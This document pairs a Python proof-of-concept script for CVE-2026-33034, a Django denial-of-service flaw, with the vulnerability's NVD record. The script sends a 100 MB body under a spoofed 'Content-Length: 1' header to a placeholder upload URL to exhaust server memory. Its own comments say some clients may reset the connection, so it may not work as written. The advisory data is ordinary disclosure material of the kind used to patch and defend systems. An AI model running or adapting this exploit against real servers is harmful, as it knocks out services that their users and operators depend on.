CVE-2026-33034

import httpx # PoC for CVE-2026-33034 # This script attempts to send a request with a spoofed Content-Length header # to bypass Django's DATA_UPLOAD_MAX_MEMORY_SIZE check. def trigger_dos(url): # Generate a large payload (e.g., 100MB) payload = b"A" * (100 * 1024 * 1024) # Headers: Claim content length is very small (e.g., 1 byte) # but send the actual large payload. headers = { "Content-Type": "application/octet-stream", "Content-Length": "1" } try: with httpx.Client() as client: print(f"Sending malicious request to {url}...") # Note: Depending on the ASGI server and proxy in front, # standard HTTP clients might reset the connection due to framing issues. # This demonstrates the logic of the exploit: mismatched header vs body. response = client.post(url, content=payload, headers=headers, timeout=30) print(f"Response status: {response.status_code}") except Exception as e: print(f"Request failed (expected if connection reset or server crashed): {e}") if __name__ == "__main__": target_url = "http://target-django-server/upload" trigger_dos(target_url)

{"cve": {"id": "CVE-2026-33034", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2026-04-07T15:17:39.393", "lastModified": "2026-04-13T17:38:35.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30.\nASGI requests with a missing or understated `Content-Length` header could\r\nbypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading\r\n`HttpRequest.body`, allowing remote attackers to load an unbounded request body into\r\nmemory.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Superior for reporting this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.30", "matchCriteriaId": "C78D8198-229F-45A2-B09D-C1D272878E3E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.13", "matchCriteriaId": "5ED295FD-7063-40A1-9A3E-C0CC4D6F7BD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.4", "matchCriteriaId": "344A677E-BD67-42F0-9746-5B0D4C53815E"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Release Notes"]}, {"url": "https://www.djangoproject.com/weblog/2026/apr/07/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}]}}